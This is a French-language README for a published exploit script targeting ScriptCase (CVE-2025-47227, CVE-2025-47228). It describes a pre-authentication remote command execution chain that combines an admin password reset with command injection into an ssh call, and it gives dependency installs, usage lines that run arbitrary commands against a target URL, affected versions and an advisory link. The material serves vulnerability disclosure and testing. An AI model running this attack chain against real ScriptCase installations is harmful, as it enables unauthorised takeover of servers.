
Script d'exploitation d'exécution de commandes à distance pré-authentifiée ScriptCase (CVE-2025-47227, CVE-2025-47228).
L'exécution de commande à distance sans authentification préalable est réalisée en enchaînant deux vulnérabilités : la première est la capacité de réinitialiser le mot de passe administrateur de la console de production sous certaines conditions, et la seconde est une simple exécution de commande à distance authentifiée dans les fonctionnalités de connexion où l'entrée utilisateur est directement concaténée à une commande système ssh.
Les dépendances Python tierces utilisées par les exploits peuvent être installées avec l'une des commandes suivantes :
# pip - universal
pip3 install Pillow pytesseract requests beautifulsoup4
# pacman - Arch Linux
pacman -S python-pillow python-pytesseract python-requests python-beautifulsoup4
Un script d'exploitation a été écrit pour traiter plusieurs scénarios :
Usage:
Examples:
Pre-Auth RCE (password reset + RCE)
python exploit.py -u http://example.org/scriptcase -c "command"
Password reset only (no auth)
python exploit.py -u http://example.org/scriptcase
RCE only (need account)
python exploit.py -u http://example.org/scriptcase -c "command" -p 'Password123*'
Detect deployment path
python exploit.py -u http://example.org/ -d
Options:
-h, --help affiche ce message d'aide et quitte
-u BASE_URL, --base-url=BASE_URL
-c COMMAND, --command=COMMAND
-p PASSWORD, --password=PASSWORD
-d, --detect
La version 1.0.003-build-2 du module Environnement de production est affectée. Cette version du module est incluse dans ScriptCase version 9.12.006 (23). Les versions antérieures sont également susceptibles d'être vulnérables.
https://www.synacktiv.com/advisories/scriptcase-pre-authenticated-remote-command-execution